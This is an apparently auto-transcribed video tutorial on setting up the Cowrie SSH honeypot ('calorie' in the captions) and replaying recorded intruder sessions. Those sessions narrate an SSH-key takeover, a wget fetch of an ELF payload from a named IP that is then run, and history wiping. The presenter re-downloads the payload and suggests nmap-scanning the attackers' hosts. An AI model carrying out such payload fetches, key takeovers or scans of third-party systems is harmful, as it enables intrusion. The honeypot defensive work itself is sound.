How to Hack the Hackers | Cowrie Honeypot

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hey what's up YouTube Welcome Back to hacker 101. all right so tonight for tonight's video I'm going to teach you guys about a tool called calorie SSH telnet honey pot that is a way we can hack the hacker right so what this tool does this tool sets up a fake SSH server a fake telnet server and any hackers that are out scanning the internet looking for vulnerable SSH or telnet servers um they find this calorie Honeypot server and when they log in calorie records everything they do every command they type every script they download every executable they download every payload and it records everything that way we have all the information on how the hacker was trying to hack our machine you know where he may have his command and control you know where is this FTP server where is he serving up his files from so we can find out a lot of information IP addresses even of the hacker that we could further investigate if we wanted to all right so before we get started um let me load up my disclaimer all right guys as you know um hacker 101 all the demos I do all the hacking that I do I do this on my own equipment I own the equipment I have permission nothing illegal is happening here I do not support any illegal activities and you should always have permission before any hacking related activities all right so with um that being said let's um I'm gonna load up Kelly Linux um just to SSH to my Ubuntu server but you need to have and Ubuntu server or a Debian server that is out on the cloud I use digitalocean you can use digital ocean you know Google cloud linode or lenode whichever you prefer but you need to have a one gigabyte one CPU very small virtual private server because the server needs to be on the internet publicly accessible for hackers to build a hacking all right so um first thing let's open up your browser and we're gonna I'm gonna show you the calorie git page so type in calorie honey pot GitHub and this the first link here this program has been around for quite some time I've used it years ago and learned about how to know how to hack the hackers find out what they're doing and get a heads up or a you know maybe one step ahead of the hackers and you know you can block them you know with your firewalls and whatnot so um calorie the GitHub page no cowrie is a medium to high interaction SSH and telnet Honeypot designed to log Brute Force attacks and the shell interaction performed by the attacker and what that means is Towery SSH Honeypot whenever the hacker packs into the fake SSH server it records everything they do like I said so it's recording all their interactions right okay so you can read more about the application on their GitHub page but the documentation is here I'm going to scroll down to how to install and I'm just going to kind of minimize this and open up my terminal all right and I'm like SSH to my uh server out on digital ocean my Ubuntu server all right so first thing we need to do um run you need to do pseudo Su and become root and do an apt update and then um once you do an apt update we're going to copy these files right here copy those but don't hit enter yet I have one more file and I will put it in the description of the video but install this package also it's python 3.10 v e and V write it down but install that package that's needed then hit enter then yes to install those all right once it install installs the dependencies are done then we're going to create a user for the calorie application so it's not running as root don't want it to run as well I just want to start up you know this program is vulnerable so this series or has no privilege let's hit okay right let that restarted Services then I'm going to do a clear all right so now let's create that copy of here and you can give it a me you can give it a name enter enter yes that information correct all right and then now we need to change to that user so do sudo ASU fast calorie become the calorie user and now we're gonna do a get clone so we're going to download the calorie application all right so let's change into that calorie directory LS there's the files all right so now we need to set up the python virtual environment so we're gonna do a PWD just to show you where in the home calorie calorie directory one thing about this application is the man they got files under folders calorie calorie it's just kind of crazy but all right so let's just type in this command copy this command and we need to edit this command before you hit enter and you can just add python3 here make this work then hit enter and that'll set up this virtual environment right now I need to activate this virtual environment that way we can install the requirements for the other requirements for calorie so we activated that and you can tell it's activated by this has to upgrade on the PIP which is the python packages installer manager yeah and then we're going to install the software requirement our packages for calorie by copying this this get all the requirements okay all right that'll be done in a second so the next thing we'll do we're gonna we're gonna we're gonna edit the configuration file which is stored in the Etsy directory and there's a file called calorie.cfg.dist right so let's go to the Etsy and you see that file we're going to copy that file and name it calorie.cfg because if you read through here you'll see both files a Reddit startup this file has takes precedence and this file does not get overwritten this file will get overwritten during an upgrade so we're going to do copy this is like a template file for you so we'll copy it like that LS and so now we're going to do Nano we're going to edit the calorie config file and we're going to change the hostname for this SRV or svr04 that looks kind of suspicious any um experience hacker is going to know that that looks kind of like a Honeypot server name so just name it whatever SSH server zero two or whatever you want to name it and then next we're going to do a control W because I'm going to search for um telnet I'm going to do left bracket telnet right bracket I'm going to hit enter and I just want to enable the typing through X or yes save it hit enter all right so now we can start the calorie but before we start it let's go to this next step you see it where it says listening on Port 22 optional this optional step now calorie lessons on Port 22 22. right most hackers are scanning the internet for Port 22 not 22. 22 and Port 23 for telnet not 22 23. so what we're going to do is we're going to tell our IP tables for any income requests on Port 22 redirected to 22 22. right that way they'll connect to the Kyrie SSH server so let's copy that hit enter sorry we got a hit control C we're going to exit out of the calorie user because we got to be root to do this so that's there all right we're going to do now we'll do the next one just copy it that's for for telnet hit enter okay all right so now let's do sudo s-u-s calorie get back to the calorie use there we go okay all right so let's go back to where we can start the program so let's go let's Bend start so let's go into the calorie directory LS all right so we're going to type in bin for a slash calorie start just like that all right so that started the calorie program I'll show you that it's running in the background all right you see it's running in the background right um so at this point um what you would do um this doesn't happen instantly you got to let this sit out online and you know eventually hackers will find it and they're going to log into the server they're going to start trying to download their payloads um they're going to try to start hacking the server um to get elevated Privileges and whatnot so this has to sit online for a while so um let this run but in the meantime I'll show you how you can watch the log file so let's do print working directory Celeste do LS let's go City Bar LS CD log LS CD calorie so what I'm talking about the directories they got a lot of directory and then LS and then you see calorie.log so you can do tell SF calorie uh log and the tail Dash f is follow so what that means is we're going to open we're going to read this file and we're going to read it on live that way whenever it's being scanned we'll see it right if we do that hit enter and now we see it's ready accepting connections subnet connections accepting SSH connection and whenever the hacker tries to hack into the server you'll see it logged here right all right and like I said this is going this will take some time so for the purpose of this video I have two calories I have a second one that I created a day or so ago and um it's already been running and had some activity on it so I'll show you what this looks like on a sir you know what you do next all right so leave your calorie server running you know you can check it in an hour or two you should start seeing some activity on the log file here but after a little bit of time you should start finding that people have logged in they started downloading files and whatnot so let me log on to the other server and I have that here and let's see what director so LS all right so this is my my second calorie server that's already been running so the first thing I want to do is I'm going to show you um let's do City VAR and then we're gonna go to LS and then you have you know we went to the log directory earlier that's where the log files but we're going to the library directory so we'll do City lib LS and then City calorie LS and you have downloads this is where any files that get downloaded are stored and then TTY this is where the recorded session like when this when the hacker logged into the server calorie records that right and it puts it so it's a recorded session into a director called TTY so we'll do CD TTY and then we'll do LS Dash all you'll see I already have a few files here and to read these files to replay these files you got to type out a kind of a long command but you'll type in Python three and you'll type in home calorie we're going back to the calorie folders and then in the bin directory then it's play log right that's the name of the program and then you just type in let's say 0 we'll do the first one um and what this is going to do when I hit enter it's going to play back what the hacker was typing in at the command prompt right so if I hit enter all right and this one is me I logged in to show you guys I typed in who am I and it's root print to working directory and then I'm gonna I'm looking at the password file so this is all recorded session where I had logged in previously to demo this and so you see I'm Echo and subscribe to hacker 101 now right so you see it's recording the session right and you see it's I'm on the SSH server right and so now that's the end of it it's finished that just showed me a recorded session so if I do a clear under a ls-all and so now let's look at the second another one take this out and I'll show you some row activity now all right so we're going to type in play log just like we did and then we're going to look at the second file and watch this one okay so this hacker logged in he changed directory to the current user's home directory he did an rm-rf to remove the SSH directory and it recreated SSH directory and then he inserted our C inserted their SSH key into the SSH directory and into authorized Keys essentially what they did is they replaced the SSH key they can now they took over the server they got rid of the weak password and now you got to have this SS SSH key to log in right well that didn't work because you know this is a Honeypot but okay so let's click let's do it clear on that one on the screen unless that's all and then the last one play this file hit enter now this person when he logged in he ran the shell command and he done ran a w get command so now we have a file here right this is a server's IP address this is our attacker our hackers IP address so now we can investigate we can check this server out we can block it so that they no longer have access to our server but we have identified a hacker's IP address and they're trying to download this file rate right so you know what is this file this dot artist forward slash 12. so they're using a web server their ip43.249.172.195 on Port 888 and the file name is 12 and I got one name one two three so they downloaded the file um they ran the file and then they deleted the file and then they cleared their history so this is the commands they ran right so if I do if I run this command do a w get all right that's right so let me type in w get so if I run this Command right here I can download that file that they were downloading right this is the file that this hacker was downloaded and I'll show you calories already downloaded this but I'm going to show you and this is another reason why you want to do this type of uh you know set up a Honeypot on a server that's not not on your network you know you're playing around with uh you know payloads and different files that uh possibly cause you issues so if we just do a kit all right so this is a elf um it's a uh L5 let's call it l file is short for executable and linkable format that's a executable file for um Linux right so you can do clear and let's do LS so we got the one two file so I can see that's through file one and two so if I wanted to decrypt or decompile this Linux executable file to dig in to get more information I could do that by typing file it would tell me what type it's a l file 32-bit blah blah blah and if I typed in strings one two I can start getting information out of this um out of this payload and I can decompile this payload and see exactly what it does but that's for another video so I'm going to hit clear on this and I'm not going to download the other file because um I want to show you in the downloads directory what it was so you saw where calorie recorded a hacker it logged in and he downloaded some files he ran them on the server hoping to exploit our heck my um honey pot server but you know it's not an actual um shell so um he wasn't or she wasn't successful in their hack all right so um let's do this let's go CD dot dot LS let's go to downloads LS and I'm gonna do a cat seven I'm gonna look at that first file this is the file that he downloaded or see downloaded the hack and download it and it is a script that they're looking for um certain chipsets like arm seven arm four six five and so forth they're looking for certain chipsets um they're looking for certain types of computers they're hacking and here is their servers IP address and here is another server's IP address that we could go and investigate this is another hackers machine and they're trying to download their payloads with this script so let's look at the the other one it is I think this is the SSH key yeah that's the SSH key that was downloaded um by that one hacker and his um he nicknamed it so whatever who's the now because uh you just um hacked a honey pot server so whatever man um but you know so we found out quite a bit of information we found out how hackers you know they're logging into our machine how they're downloading their executable files you know whether we downloaded that one Linux executable elf file that we can decompile and possibly find you know their command and control we did find IP address of their server that's hosting their payloads we could then run an nmap scan on those servers to see you know what we find but this is a way you can hack the hackers back we know what they're doing we can see what they're trying you know how they're trying to get into our systems and we can use that information to help secure our environment so um I hope you enjoyed the video um it's kind of a long video but um yeah if you have any questions about this setup you know leave comments and if you like the video Hit subscribe and I will create you guys another video all right thanks

Info

Channel: Hacker 101

Views: 4,060

Rating: undefined out of 5

Keywords:

Id: m7ZmwjyhzHU

Channel Id: undefined

Length: 21min 20sec (1280 seconds)

Published: Wed Aug 09 2023